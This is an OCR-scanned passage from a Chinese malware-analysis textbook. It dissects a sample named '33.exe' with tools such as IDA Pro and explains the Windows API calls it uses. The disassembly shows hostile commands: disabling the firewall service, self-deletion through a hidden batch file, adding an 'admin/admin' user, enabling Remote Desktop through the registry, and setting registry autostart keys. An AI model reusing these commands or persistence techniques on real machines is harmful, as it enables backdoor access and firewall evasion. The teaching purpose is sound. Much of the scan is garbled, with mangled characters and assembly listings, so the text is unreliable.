备注 : Windows ТАМАТА ЕЕ. 


Ее: 


图 9-38 防火墙 关闭 提示 
检测 ApateDNS， 发 现 并 没有 对 Internet 进 行 的 访问 ， 如 图 9-39 所 示 ， 说 明 病 毒 没 有 悄 
悄 在 后 台 访 问 网 站 或 下 载 其 他 病毒 。 


Capture Window 


Domain Requested DNS Returned 


[+] Using 127.0.0.1 as return DNS IP! 


[+] Server started at 22:40:45 successfully. 


9-39 ApateDNS 截 获 
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再 次 进入 虚拟 机 ， 发 现 出 现 另 外 一 个 密码 用 户 ， 则 可 以 推断 病毒 利用 CMD 命 令 进行 
了 一 次 用 户 添 加 操作 ， 如 图 9-40 所 示 。 


_ 


Microsoft 


" 
Windows 


9-40 ” Windows 登 录 界 面 
使 用 快照 还 原 系统 ， 接 下 来 用 调试 工具 对 其 进行 源码 上 的 分 析 。 
自 先 使 用 PEiD 进 行 碍 元 ， 如 图 9-41 所 示 ， 盘 学 结果 显示 其 并 没有 被 加 元 。 
не: Ерос аі занан аве 7 77” |4 
ЕР Section: Мел 00 


First Bytes: 55,8В,ЕС,бА 
Subsystem: Win32 GUI 


Entrypoint: 00001501 — 
File Offset: 00001501 
Linker Info: 60 


Microsoft visual С++ 6.0 


М Stay оп top [8] |->] 


89-41 Ж 
接 下 来 ， 可 以 选择 Dependency Walker 或 者 Stud_PE 对 其 使 用 的 函数 进行 分 析 ， 在 
KERNEL32.DLL 截 获 的 函数 中 ，CopyFileA 与 CreateFileA 函 数 〈 见 图 9-42 ) 作为 移动 目标 
函数 将 “33.exe” 文 件 移动 至 系统 目录 。 


Ordinal ^ [int | Function | Entry Point 
27 (0x001B) |CloseHandle Not Bound 


НЕА 40 (0х0028) С оруҒі Тед Not Bound 


H/A 
H/A 
H/A 
H/A 
N/A 


ҰЛЫҒЫ ЫЫ ЫШ Шы ЕЕ 


LoadLibraryA 用 来 装载 DLL 文件 库 ， 在 本 例 中 是 装载 KERNEL32.DLL，WinExec 用 来 


52 (0х0034) 
125 (0х007р) 
170 (Ох00АА) 
178 (0х0082) 
179 (0х0083) 
185 (0х0089) 
191 (Охо0ВЕ) 
202 (0х00СА) 
247 (Ох00ЕТ) 
262 (0х0106) 
264 (0х0108) 
265 (00109) 
277 (0х0115) 
282 (0х011А) 
292 (0х0124) 
294 (0х0126) 
305 (0х0131) 
318 (0х0138) 
336 (0х0150) 
338 (0х0152) 
339 (0х0153) 
342 (0х0156) 
345 (0х0159) 
372 (0х0174) 
373 (0х0175) 
409 (00199) 
411 (0х019Б) 
413 (0х019) 


ө» “= sm 


CreateFileÀ 
ExitProcess 
FlushFileBuffers 
FreeEnvironmentStringsÀ 
FreeEnvyironmentStringsW 
Get АСР 

GetCPInfo 

Се Сотпап Пл пеА 
GetCurrentProcess 
GetEnyironmentStrings 
GetEnvironmentStringsW 
GetEnyironmentVariableÀ 
GetFileType 
GetLastError 
GetModuleFileNameÀA 
GetModuleHandleÀ 

Се + ОЕМСР 

GetProcAddress 
GetStartupInfoÀ 
GetStdHandle 
GetStrineTypeh 
GetStringTypeW 
GetSystemDirectoryÀ 
GetVersion 
GetVersionExÀ 
НеарА11ос 

КезрСгез е 

HeapDestroy 


Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 
Not Bound 


Not Bound 


т. С 


9-42 КЕКМЕ! 32 ОП (1) 


执行 程序 ，WriteFile 则 是 写 入 文件 ， 如 图 9-43 所 示 。 
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LCMapStringå 
ІГМарбігіпгй 
LoadLibraryå 
MultiByteToWideChar 
Rtllrwind 
SetFilePointer 
SetHandleCount 


SetStdHandle 
TerminateProcess 
UnhandledExceptionFilter 
VirtualÀAlloc 

VirtualFree 
WideCharTollultiByte 


Pn8PPBBBBBBBBE PBI 


WriteFile 


9-43 ”KERNEL32.DLL (2) 
ExitWindowsEx (И 9-44) 是 关机 程序 ， 目 的 是 为 了 在 Windows 系 统 下 修改 注册 表 
使 其 生效 并 重 局 计算 机 。 
33.18 ІМ [Ordinal ` | Hint Function Entry Point | | 


E) IMA 211 (0х0003) | ExithindowsEx Not Poud 


99-44 USER32.DLL 
如 图 9-45 所 示 的 最 后 三 个 修改 注册 表 的 函数 则 是 局 动 “3389” 的 徘 魁 祸首 。 经 过 奏 看 
图 数 及 行为 分 析 ， 读 者 大 体 已 经 明白 了 该 病毒 的 功能 是 开局 远程 昌 面 ， 关 闭 防 火 墙 ， 建 立 
新 用 户 ， 目 局 重生 。 


а 33. Е 

H- 8 KERMEL32 DLL 

H- Ü] 157832. DLL 

由 - |1 [лд 
347 (0х0158 
351 (00158) | RegCreateKeyExÀ 
390 (00186) | RegSetValueExA 


9-45 ADVAPI32.DLL 
而 要 从 源码 上 更 深层 次 地 了 解 该 病毒 ， 就 需要 使 用 反 汇 编 工 具 一 一 IDA Pro/OD， 本 次 
我 们 利用 IDA Pro (049-46) 工具 进行 病毒 源码 的 分 析 。 


|) -IDA v6. 5. 140124 
Pile ІМ Tap Sear 


еве =» е % }$ 


қ } 


lirdows {ер 

ма: [a] ә: ба” # ах 
Load File CIVDocnnants and Settingstadsini 8 (0\33. exe 

Fortable executable for 00306 (PE) [pe 14%] 


Processor type 


МетаРС (disassemble all opcodes) [metapc] “ 
Analysis 


Loading segment [ox00000003 
[7] Enabled 
Loading offset |Ох00000000 Indicator enabled 


Options 

-creste зама 
C] Load resources 

Rename DLL entries 


rika asa 


Fill segment gaps 


E create фен жөне 


C Create FLAT group 


DLL directory С: WIRDOYS 


9-46 IDA Pro 
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单 击 OK 按 钮 进入 主 界面 ， 出 现 如 图 9-47 所 示 的 反 汇 编 文本 界面 。IDA Pro 还 文 持 图 形 


模式 ， 按 “空格 ” 键 进行 切换 ， 如 图 9-48 所 示 。 


IDA - C:\Documents and SettingsyvadminX EI] X 33. ехе 


File Edit 


Search View Debugger Dptions Windows Help 


р 


-А [Х| 


esi 


External symbol 


Г 6, ф ПО Зан жах p О Шәке м) 918): 
П ul 


Library function | Data BB Regular function P Unexplored № Instruction 


„гехг: 00801000 
„Сех с: 00401000 ; File Мате 
.text:00401000 Format 
.-text:00401000 
.-text:00401000 
-text:00401000 
.-text:00401000 
.-text:00401000 
.-text:00401000 
-text:00401000 Alignment 
-text-001501000 05 tupe 
.ТехЕ: 99491099 
.ТехЕ: 09491009 
„Сехг: 09491909 
„Сехг: 09401009 
„Техг: 0094910909 
„Техг: 0094910909 
.ТехЕ: 994910909 
„Сехг: 09491909 
-ҒехЕ:8 8501880 
.ҒехЕ:8 85081880 
„сех: 00301000 
„сех: 00301000 
-Text: ИИЧИТИНИ text 
.ҒехЕ:8 8501880 
„Техг: 85081880 
.ТехЕ: 909491099 

- сех: 00301000 
„Сехг: 094910089 
.ҒехЕ:8 8501880 
.ҒехЕ:8 08501880 
-text:00401000 ; int _ cdecl sub_401000(HKEY hKey, LPCSTR Ір5изКеу, LPCSTR lpValueName, BYTE »1рОаГа) 
.ҒехЕ:80501088 си» 5010080 
-сехі: 00301000 

-сехі: 00301000 

-сехі:0 0501000 hKey 


Imagebase 


00001000 00401000: зир 401000 


Application Туре: 


Нех Уіеч-А 


ЕЗ | М 


Structures 


C:\Documents and Settings%sadminxsE[B]N33.exe 


: Portable executable for 80386 (PE) 


: 400000 


: deFault 
: HS Windows 


Section 1. (virtual address 0000108080) 
Uirtual size 

Section size im File 
Offset to raw data for section: 
Flags 60000020: Text Executable Readable 


00004E78 ( 20088.) 
00005000 ( 2904809.) 


00001000 


Executable 32bit 


include uni.inc ; see unicode subdir of ida for info on unicode 


-686р 
- MMX 
-model flat 


Segment type: Pure code 
Segment permissions: Веад/Ехесиее 


segment para public “ІШЕ” use32 


assume cs:_text 
sorg 4919981 


assume es:nothing, 55 :по П1пд, 45: даға, Fs:nothing, 95: по П1 по 


SUBROUTINE 


proc near 


= dword ptr 4 


; CODE XREF: sub_401180+921p 
; ит пМатп(х,х,х,х)+ Вр ... 


图 9-47 文本 模式 


е51 
есх 


; dw0ptions 
; ТрС1а55 

; Reserved 
; ТрзибКеу 
; ПКеу 
х 


ds:RegCreateKeuExñ 


eax, eax 
short loc_4010C9 


Structures 


offset aErrorNoRegcrea ; "error по RegCreateKeyEx %5\п"' 


5ub 4814008 


esp. 
esi 


Я ка СЗ 


push 
push 
call 
add 
pop 
retn 


esi 

offset aErrorHoRegsetu 
540 4981800 

esp, 8 

е51 


89-48 


Ш ка СЗ 

Тос 501069 : 

mou езі, [е5р+Н+1рУа1иеНате | 

mov eax, [еѕр+д+1рѕиһЬКеу] 

lea edx, [esp*4+Data] 

push 4 ; CbData 

push edx ; lpData 

push ы ; йитуре 

push а ; Reserved 

push ез1 ; lpValueName 

push еах ; ПКеу 

са11 ds :Ведзе Мат чеЕхй 

test eax, eax 

jz short Тос 301 8Е9 

y ғы 

= + 


2 


; "error no RegSetUalueEx %5\п"[ Пос 1848Е8: 


图 形 模式 


moy ecx, [esp+4+1pSubKkey] 
push ecx ; hKey 
call ds:RegCloseKey 

pop esi 

retn 


emh AJANA nnen 


ҚХА, ЯНА, ИЕР У, WETERE Н Н 
图 数 名 称 ， 灰 色 字 体 则 专门 对 offset 进 行 注释 。 
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ША Рю АРКЕ МИН А. ТЕРА Н, Өн kO ВОН K ИЖ 
件 跳 转 ， 绿 色 箭 头 包 表 示 该 跳 转 已 发 生 ， 而 赣 色 箭头 则 表示 发 生 无 条 件 跳 转 ， 癌 上 的 箭头 
则 通常 表示 循环 体 。 

仍然 从 函数 入 手 ， 这 里 使 用 较为 方便 的 图 形 模式 进行 源码 分 析 。 执 行 View 一 subviews 一 
Imports 命 令 ， 打 开 的 Imports 界 面 如 图 9-49 所 示 。 


IDA View-À | Нех Уіен-А 
Address Ordinal Hame | Library 


%-| 00406000 
ФЕ 00406004 
ФЕ 00406008 
ФЕ) 0040600C 
№=| 00406010 
№=| 00406014 
ФЕ 00406801C 
ФЕ) 00406020 
№=| 00406024 
№=| 00406028 
№=| 0040602С 
№=] 00406030 
№=| 00406034 
№=| 00406038 
ФЕ 0040603С 
®=| 00406040 
№=| 00406044 
ФЕ) 00406048 
№=| 0040604С 
№=| 00406050 
№=| 00406054 
ФЕ) 00406058 


LookupPrivileeeValueh 
ådjustTokenPrivileges 
КегСгеаїеКеуЁхА 
RegSetValueExÀ 
RegCloseKey 
ÜpenProcessToken 
CreateFileÀ 
GetVersionExÀ 
WriteFile 
GetStringTypet 
GetStringľypeå 
CloseHandle 

WinExec 
GetSystemDirectoryå 
GetModuleFileNameå 
СоруЁЕ11еА 
GetCurrentProcess 
GetModuleHandleÀ 
GetStartuplInfoÀ 
GetCommandLineÀ 
GetVersion 
ExitProcess 


АПУАРІЗ2 
АПУАРІЗ2 
АПУАРТЗ2 
АПУАРІЗ2 
АПУАРІЗ2 
АПУАРІЗ2 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕІ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 
КЕЕНЕТ 32 
КЕЕНЕТ 32 
КЕКНЕТ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 
КЕКНЕТ 32 
КЕЕНЕІ 32 


ФЕ] 0040605С TerminateProcess 
[ 9-49 Imports 界 面 
按 Ctrl+F 组 合 键 ， 或 者 直接 在 Imports 界 面 输入 函数 名 称 ， 就 会 目 动 搜索 定位 到 该 函 
数 ， 先 选中 CreateFileA 函 数 ， 然 后 双击 它 进 入 反 汇 编 界 面 〈 见 图 9-30) ， 在 此 就 可 以 看 出 
dd hai tie 


图 9-50 ЕЯ 
按 Ctrl+X 组 合 键 ， 局 动 Xref 界 面 〈 交 叉 引 用 ) 〈 见 图 9-S1) ， 这 里 列 出 了 函数 被 调用 
的 地 址 以 及 被 调用 的 次 数 。 


ку хгеҒ5 То СгеатеЕ 1 Тед 


Directi Тур Address Text 
sub 401230+18 са а=: Суеа е 1] еА 
р sub 4012С041В ds:CreateFileÀ 
ШІр г sub 401230+1B са11 ds:CreateFileÀ 
с; Up r sub 4012С041В call ds:CreateFileÀ 
““ о .rdata:D0406504 dd гуа Скез е 1 Те ; Import Address Table 
Line | of 5 


图 9-51 Хге м 
选择 地 址 sub 401230+1B， 进 入 其 图 形 模 式 ， 通 过 图 形 模式 可 以 清楚 地 看 到 该 函数 所 
附带 的 功能 及 运行 的 详细 流程 ( 见 图 9-52、 图 9-53) 。 
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uar_CD= byte ptr -6CDh 


esp, 1940 

ерх 
пТепртагевтте 
dwFlagsAndAttributes 
dwCreationDisposition 
lpSecurityAttributes 
dwSshareMode 

399990999" йдибесігеййссе55 

offset CmdLine ; "del. cmd'' 

ds:CreateFileñ 

ebx, еах 

ebx, ebx 

short loc_4012AD 


esi 

edi 

ecx, ВСП 

есі, offset aNetStopShareda ; "net stop sharedaccess \r\n del 33.ехе \"... 
edi, [esp+116h+Buffer] 


eax, eax 
rep mousd 
поубш 
mousb 
тоу ecx, 33h 
lea edi, |езр+119п+ чак Ср] 
rep 51050 
Теа eax, [esp+110h+Number0fBytesWritten] 
push 9 ; ТрОчектаррейд 
ризп еах ; 1lpHumber0FfButesuritten 
Теа ecx, [esp+118h+Buffer] 
push 64h ; nNumber0fButesTowWrite 
push есх ; lpBuffer 
push ерх ; hFile 
тоу [esp*+124h+NumberOfBytesWritten], 8 
call ds:WriteFile 
push ebx ; hObject 


call ds:CloseHandle 
III 


9-52 CreateFileA (1) 


НЕ “а алани i 
тоу [esp+124h+Number0fBytesWritten], 8 
call ds:WriteFile 

push ebx ; hObject 

са11 ds :СТосеНапяЯте 

push 8 ; UCmdShow 

push offset CmdLine ; “del.cmd" 

call ds :WinExec 

pop edi 

pop esi 


ebx 
esp, 1941 


sub 8012308 endp 


图 9-53 CreateFileA (2) 
从 图 9-53 中 可 以 看 出 ， 首 先 映 入 眼帘 的 是 备注 offset CmdLine 的 “del.cmd” 语 句 ， 结 
合 后 文 的 aNetStopShareda 函 数 及 其 灰 字 备注 ， 可 以 得 出 该 目 删 除 过 程 是 先 调用 CreateFileA 
函数 创建 了 一 个 CMD 命 令 文件 ， 返 回 一 个 实例 句柄 ， 同 时 通过 WriteFile 预 先 写 好 命令 ， 实 
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现 关 闭 防 火 墙 以 及 删除 文件 自身 功能 。 然 后 ， 再 通过 最 后 的 WinExec 函 数 АШЫШ 
运行 该 “delcmd” 删 除 上 自身， 并且 设 置 其 窗口 为 隐藏 状态 ， 这 就 是 为 什 at Шор S 
么 之 前 我 们 用 Process Monitor 检 测 到 了 CMD 在 一 瞬间 被 使 用 之 后 ，“33.，: да = => 
exe” 神 秘 消 失 的 原因 ， 由 此 可 见 病毒 并 不 神秘 。 一 一 一 一 一 一 

之 后 我 们 可 以 单 击 界面 左上 角 Jump 菜 单 下 面 的 左 箭头 〈 见 图 9-54) 954 ЖӘН 
回 到 刚才 的 CreateFileA 函 数 界面 ， 然 后 调 出 Xref 选 择 第 2 个 地 址 sub 4012C0+1B， 并 进入 图 
形 模式 。 

对 比 上 例 “del.cmd”“add.cmd” 名 称 与 之 形成 鲜明 对 比 ， 该 过 程 则 是 通过 命令 “net 
user admin” 来 添加 新 用 户 ， 由 注释 可 知 新 添加 的 账户 以 及 密码 均 为 admin， 如 图 9-55 所 示 。 


var 95= byte ptr -95h 


sub esp, 1941 

push ebx 

push 8 ; hTemplateFile 

push 2 ; duFlagsñndñttributes 
push 2 ; dwCreationDisposition 
push 9 ; lpSecurityfAttributes 
push 2 ; dwSharehMode 

push 1n00880808h ; duDesiredñccess 


push offset FileName ; "add. cmd'' 
call ds:CreateFileñ 


тоу еһх, еах 
test ebx, ebx 
12 short loc 481330 


Í| 1h 

i, offset aNetUsernhdminNe ; "net user admin Хкуп net user admin admi"... 
‚ [esp+118h+Buffer] 
, eax 


‚ 251 
‚ [esp+119h+uar 95] 


eax, [esp+118h+NHumber0fButesUritten] 

9 ; ТрОуекТаррейд 

eax ; lpNumberOfBytesWritten 
ecx, |езр+1181+ВиЕЕен | 

64h ; nNumberOfBytesToWrite 
есх ; lpBuffer 

ebx ; hFile 
[esp+124h+Number0fBytesWritten], 6 
ds:uriteFile 

ebx ; h0bject 
ds:GloseHandle 

9 ; uCmdShow 

offset FileName ; "add.cmd" 

4$ : 41 пЕхес 

ейі 

есі 


图 9-55 Сгеае ед (3) 
最 后 ， 在 C 语 言 中 来 看 看 这 些 函 数 的 真面目 。 


HANDLE СгеаіеЕі1е ( 


LPCTSTR 1рЕ11еМапе, // 指 向 文件 名 称 的 指针 
DWORD dwDesiredAccess, // 访 问 权限 
DWORD dwShareMode, / /共享 方式 
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ЪРЗЕСОВТТУ ATTRIBUTES lpSecurityAttributes,// 安 全 属性 


DWORD dwCreationDisposition, / /创建 标志 
DWORD dwFlagsAndAttributes, // 文 件 属性 
HANDLE hTemplateFile // 模 板 文件 句柄 


); 


首先 来 认识 一 下 参数 前 的 类 型 声明 。 

> LPCSTR: 指针 字符 串 类 型 ， 指 向 一 个 常量 字符 串 ， 并 且 以 ”\0” 结 尾 ， 前 级 标识 
为 ]p; 

> DWORD: RF (324) 的 无 符号 长 度 单位 ， 前 缓 标 识 为 dw， 与 之 相近 的 WORD 
类 型 ， 为 双 字 节 (1642), в] 

> HANDLE: 实例 句柄 ， 被 用 于 Windows АРІ ях; 

> HWND: % 0 0) 35, WAR Ah; 

> BOOL: 布尔 值 ， 前 缓 为 b; 

> UNIT: unsigned int， 无 符号 整数 。 

LPSECURITY _ ATTRIBUTES 则 为 一 个 结构 体 ， 有 具体 代码 如 下 。 


СуреаеЕ struct SECURITY ATTRIBUTES | 


DWORD nLength; / /结构 体 大 小 
LPVOID lpSecurityDescriptor; // 安 全 描述 符 
BOOL bInheritHandle ; // 判 断 句 柄 是 否 安全 继承 


} БЕСОКТТУ АТТКТВОТЕ5; 


下 和 面 册 来 谈 谈 参数 值 设 定 。 

(1) lpFileName 一 般 设 置 为 文件 路 径 或 者 文件 的 名 称 。 

(2) dwDesiredAccess 设 置 为 GENERIC READ |СЕМЕВІС WRITE， 即 可 以 进行 读 写 操作 。 

(3) dwShareMode 可 以 为 0。 

(4) FILE SHARE DELETE, FILE SHARE READ, FILE SHARE WRITE 中 任意 
个 数 ， 分 别 为 不 可 共享 、 可 删除 、 可 读 、 可 写 。 

(5) LPSECURITY ATTRIBUTES 则 通常 设置 为 NULL。 

(6) dwCreationDisposition， 表 示 对 文件 存在 与 否 所 执行 的 行为 ， 分 别 为 : 

> CREATE ALWAYS (创建 文件 ， 若 之 前 该 文件 存在 ， 则 改 盖 改写 上 一 个 文件 ) 。 

> CREATE NEW (创建 文件 ， 文 件 存在 时 报错 ) 。 

> OPEN ALWAYS (文件 不 存在 就 创建 文件 ) 。 

> ОРЕХ EXISTING (文件 必须 已 经 存在 ) 。 

> TRUNCATE EXISTING (文件 长 度 清 零 ) 。 

(7) dwFlagsAndAttributes， 病 毒 一 般 会 设置 为 FILE ATTRIBUTE HIDDEN， 也 就 是 
文件 处 于 隐藏 状态 。 
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(8) hTemplateFile, # GF В ММО. 
由 此 就 可 以 推断 “del.cmd” 以 及 “add.cmd” 的 CreateFile 调 用 方式 为 : 声明 一 个 句柄 
Handle xxx 来 接收 CreateFile 的 返回 值 ， 即 


HANDLE ХХХ = CreateFile("del/add.cmd",GENERIC WRITE, FILE SHARE | 
WRITE, 0, СВЕАТЕ ALWAYS, FILE ATTRIBUTE HIDDEN, NULL); 


是 不 是 很 简单 ? 完成 了 创建 文件 的 操作 ， 下 一 步 就 是 对 文件 进行 读 写 操作 了 ， 即 使 用 
WriteFile 函 数 来 实现 。 


BOOL WriteFile( 


HANDLE hFile, // 文 件 句柄 

LPCVOID lpBuffer, // 写 入 数据 缓存 区 的 指针 

DWORD nNumberOfBytesToWrite, // 写 入 字 节 数 

LPDWORD lpNumberOfBytesWritten，// 用 于 保存 实际 写 入 字 节 数 的 指针 
LPOVERLAPPED lpOverlapped // 用 于 指向 保存 I/0 异 步 信 息 的 结构 体 


|: 


RTA, ЛЕД] P ВО WriteFilek В 122 ЩВЕПЕл: BJ U H]CreateFile R 013 ЕНУ) 
xxx]. 52125: рВиЙег А ХР 3-2> ЖабкишшЬегО ВувеТо Write l) е R] 3 5 А НЯ 
创建 用 户 的 代码 ， 第 4 个 参数 lpNumberOfBytesWritten 则 指向 实际 写 入 的 代码 ， 最 后 一 个 
lpOverlapped 通 常设 置 为 NULL。 

之 后 执行 的 是 CloseHandle 函 数 ， 因 为 之 前 调用 CreateFile 时 创建 了 一 个 xxx 人 句柄， 
在 文件 读 写 操作 结束 以 后 要 关闭 这 个 句柄 ， 以 防 被 其 他 函数 误 用 并 且 释 放 系 统 内 核资 源 

(HANDLE 句 柄 资源 ) 。 


BOOL CloseHandle( 
HANDLE hObject // 5824 
); 
С1озеНапа1е (X X х); // А Ме 


接着 ， 则 使 用 WinExec 函 数 运 行 CMD 命 令 行 程 序 ， 整 个 过 程 就 结束 了 。WinExec 函 数 
包含 两 个 参数 ， 具 体 如 下 : 


UINT WINAPI WinExec ( 

„Та LPCSTR lpcmqdLine，// 命 令 行 代码 参数 
“Іп UINT uCmdShow // 命 令 窗口 

) 


第 1 个 参数 jpCmdLine 是 之 前 生成 的 CMD 程 序 ， 第 2 个 参数 uCmdShow 根 据 分 析 来 看 则 
是 隐藏 窗口 ， 也 就 是 设置 为 SW_HIDE。 
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И1 пЕхес ("де1.ста", SW HIDE) ;// 调 入 运行 状态 


通过 查阅 MSDN (微软 提供 的 强大 函数 库 查 询 工 具 ) ， 可 以 了 解 函 数 参 数 的 详细 信 
县 ， 而 函数 后 缀 如 CrateFileA 的 后 级 A 则 表示 编码 方式 为 ASCI 码 ，W 则 表示 Unicode 编 码 ， 


Ex 则 表示 最 新 发 布 。 
接 下 来 看 看 该 病毒 对 于 3389 的 开启 过 程 〈 见 图 9-$S6) 。 


ecx, [esp+hKeu] 
esi 
есі, |езр+4+1р5шрКеу| 
eax, [esp+%u+1pSubKeu] 
8 ; lpdwDisposition 
еах ; phkResult 
8 ; 1pSecurituñttributes 
ЯҒ 8ӨЗЕІ ; сапфесігей 
; dw0ptions 
; ТрС1а55 
; Reserved 
; ТрзирКеу 
; hkey 
05 :КедСкеаГеКеуЕхя 
eax, eax 
short 10с 8081039 


есі 

offset aErrorNoRegcrea ; "error по RegCreateKeyEx %5\п"' 
си» 4981408 

esp, 8 

е51 


‚ Гезр+4+1рдага| 


1, edx 
‚ ВЕЕЕЕЕЕЕЕП 
‚ еах 


i, Гезр+8+1рУа1 чеНапе | 


repne scasb 
есх 
есх 
есх 
ейх 


edx, 


1 
еах 
есі 
ейх 


; сһраға 

; Трбага 
Гезр+19п+1р5зирКеу |) 

; дчТуре 

; Reserued 

; lpValueName 

; ПКеу 


ds:RegSetUalueExñ 


eax, 


9-56 ”注册 表 过 程 ( 1) 


еах 


18 BH W JA R: ER УЕ K р 0 КеоСтеаіеёКкеуЕхА. Кео5е(УашеЕхА, RegCloseKey 
得 知 ， 该 图 形 过 程 押 代表 程序 的 作用 是 修改 之 前 使 用 Regshot 快 照 得 出 的 注册 表 键 值 ， 也 


ле: 


НЕКҮ LOCAL MACHINE\SYSTEM\ControlSet00 1\Control\Terminal Server КОРТср 
НЕКҮ LOCAL MACHINE\SYSTEM\ControlSet00 Пвеглсе RDPWD. Enum 

НЕКҮ LOCAL MACHINE\SYSTEM\ControlSet00 1\Services\TDTCP\Enum 

НЕКҮ LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Зегуе\КОРТср 
НЕКУ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\RDPWD\Enum 
НЕКУ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\TDTCP\Enum 


等 等 。 


分 析 一 下 流程 ， 这 个 程序 使 用 RegCreateKeyExA 来 打开 /创建 以 上 的 注册 表 ， 并 且 返 回 
创建 一 个 实例 句柄 。 这 里 出 现 一 个 条 件 跳 转 语句 ， 如 果 函 数 调 用 失败 则 返回 error 并 且 退 出 
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程序 ， 若 打开 /创建 程序 成 功 便 调用 RegSetValueExA 对 该 键 值 进行 修改 。 随 后 继续 出 现 一 
个 条 件 跳 转 语句 ， 也 就 是 对 于 键 值 是 否 修改 成 功 进行 判断 ， 如 果 修 改 失 败 则 返回 error 然 后 


退出 程序 ， 如 果 修 改 成 功 则 调用 RegCloseKey 关 闭 句 柄 ， 如 图 9-S7 所 示 。 


са11 ds:RegSetUalueExñ 
test еах, еах 

рор ейі 

| short loc 4819274 


есі 
offset aErrorNoRegsetu ; “error по RegSetUalueEx %5\п“[ Пос 801075: 
sub 501508 eax, Гезр+4+1р5шрКеу | 


еср, 8 еах ; hKey 
е51 ds:RegCloseKeu 


Sub 801888 endp 


图 9-57 ”注册 表 过 程 ( 2 ) 
查 疯 MSDN， 从 源码 上 分 析 这 三 个 函数 。 


LONG WINAPI RegCreateKeyEx ( 


НКЕУ һКеу, //НКЕУ: 注册 表 根 键 

LPCTSTR lpSubKey, // 打 开 或 创建 键 值 

DWORD амВеѕегуеа, // 人 参数 必须 设 为 0 

LPTSTR lpClass, // 用 户 定 义 的 类 , 可 以 设 为 NULL 

DWORD dwOptions, // 功 能 选择 

ВЕСЗАМ samDesired, // 访 问 权 限 

CONST LPSECURITY ATTRIBUTES lpSecurityAttributes，// 安 全 属性 
PHKEY phkResult， / /用 来 接收 打开 /创建 键 值 的 句柄 

LPDWORD phkResult / /装载 变量 


); 


第 1 个 参数 hKey 的 值 往 往 是 注册 表 根 键 其 中 之 一 ， 注 册 表 根 键 为 以 下 S 个 。 

> HKEY USERS: 保存 计算 机 所 有 用 户 的 信息 ， 包 括 登 录 计 算 机 账号 及 密码 。 
> HEKY CLASSES ROOT: 保存 文件 类 型 的 信息 。 

> НЕКУ CURRENT USER: 保存 当前 系统 的 用 户 信 息 。 

> HEKY CURRENT CONFIG: 保存 当前 用 户 的 系统 配置 信息 。 

> НЕКҮ LOCAL MACHINE: 保存 计算 机 硬件 信息 ， 包 括 远程 计算 机 访问 的 键 值 。 
由 开启 远程 桌面 “3389” 功 能 确定 : 

第 1 个 参数 设置 肯定 为 排列 在 末尾 的 HEKY LOCAL MACHINE. 

第 2 个 参数 ljpSubKey 则 设置 为 之 前 Regshot 快 照 中 被 修改 的 注册 表 键 值 的 地 址 。 
第 3 个 参数 dwReserved 设 置 为 0。 

第 4 个 参数 ]jpClass 奋 用 户 没 有 定义 类 ， 则 设 NULL。 
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第 5 个 参数 dWOptions 设 置 为 REG OPTION BACKUP RESTORE, REG OPTION ` 
CREATE LINK. ВЕС ОРТІОМ МОМ VOLATILE、 ВЕС OPTION VOLATILE 之 一 ， 
其 中 常用 的 为 REG OPTION NON VOLATILE: 信息 保留 在 文件 中 ， 重 启 之 后 仍然 被 保 
Ж. КЕС OPTION VOLATILE 信息 保留 在 内 存 中 ， 重 启 之 后 失去 效果 。 

第 6 个 参数 samDesired， 一 般 均 为 KEY АП. ACCESS， 也 就 是 允许 所 有 操作 。 

第 7 个 参数 lpSecurityAttributes 指 向 的 句柄 无 继承 则 设置 为 NULL。 

第 8 个 参数 phkResult 可 以 指 回 定义 任意 一 个 根 键 的 地 址 ， 用 于 被 其 他 注册 表 函 数 使 
用 ， 如 定义 HKEY hKEY， 则 参数 设置 为 &hKey。 

最 后 一 个 参数 为 REG CREATED NEW KEY ( 若 子 键 存在 则 打开 ， 不 存在 则 创建 ) 
或 者 REG OPENED EXISTING KEY ( 当 且 仅 当 子 键 存在 时 打开 ) 。 

当 RegCreateKeyEx 创 建 或 者 打开 一 个 子 键 值 后 ， 接 下 来 就 是 调用 RegSetValueEx 对 其 


键 值 进行 修改 。 
LONG RegSetValueEx ( 

HKEY hKey, // 根 键 
ТРСИЗТВ lpValueName, // 将 要 修改 的 键 值 名 称 
DWORD Reserved, // 设 置 为 0 
DWORD dwType, // 键 值 的 数据 类 型 
CONST ВҮТЕ* lpData, // 指 向 读 写 键 值 的 缓冲 区 
DWORD cbData // 缓 存 区 大 小 


| 


本 例 中 的 参数 一 hKey 就 被 设置 为 RegCreateKeyEx 中 的 phkResult 的 参数 HKEY。 参 数 一 
得 到 了 将 要 修改 键 值 的 详细 地 址 ， 因 此 参数 二 lpValueName 只 用 设置 为 键 值 的 键 名 。 参 数 
四 dwType 通 常设 置 为 REG_DWORD (用 于 修改 双 字 类 型 ) 或 者 REG_SZ (用 于 修改 字符 
串 类 型 ，SZ (string zero) 表示 null 结 尾 的 字符 串 ) 。 参 数 五 jpData 设 置 为 指 问 包含 数据 组 
冲 区 《修改 键 值 的 目标 值 ) 的 指针 。 参 数 六 cbData 可 以 通过 strlen 函 数 /size of 函数 分 别 得 出 
类 型 为 字符 串 / 双 字 的 缓冲 区 的 大 小 。 

有 关注 册 表 的 最 后 一 个 函数 RegCloseKey 则 非常 简单 。 


LONG RegCloseKey ( 
HKEY hKey 
// 设 置 为 之 前 由 RegCreateKeyEx 返 回 的 参数 phkResult, ХЕ 8 ЖһКеу 

); 

该 病毒 最 后 一 个 功能 就 是 将 自身 复制 进入 系统 目录 ， 通 过 修改 注册 表 HKEY _ 
CURRENT USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\Windows， 修 改 load 键 
值 进行 开机 目 局 。 通 过 修改 注册 表 进 行 自 局 的 方法 还 有 以 下 几 种 : 

HKEY LOCAL MACHINE\software\Microsoft\WindowsNT\CurrentVersion\Winlogon\ 
